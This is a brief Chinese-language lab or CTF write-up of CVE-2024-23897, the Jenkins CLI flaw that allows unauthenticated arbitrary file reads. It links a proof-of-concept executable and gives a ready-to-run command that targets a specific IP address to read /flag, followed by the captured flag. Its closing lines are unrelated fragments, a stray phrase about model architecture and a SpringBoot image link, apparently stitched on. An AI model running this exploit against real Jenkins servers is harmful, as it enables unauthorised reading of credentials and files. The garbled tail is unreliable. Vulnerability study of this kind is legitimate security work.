1.漏洞介紹
Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本沒有禁用其CLI命令解析器的一個功能,該功能會將參數中'@'字符后跟的文件路徑替換為該文件的內容,允許未經身份驗證的攻擊者讀取Jenkins控制器文件系統上的任意文件。
2.poc利用
下載地址:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip
CVE-2024-23897.exe -u http://39.106.48.123:34583/ -a /flag
flag{d2545f14-3361-4c73-83ce-c7a16cfadf1c}
架構?它如何提升模型效率?)
![[SpringBoot]快速入門搭建springboot](http://pic.xiahunao.cn/[SpringBoot]快速入門搭建springboot)
)
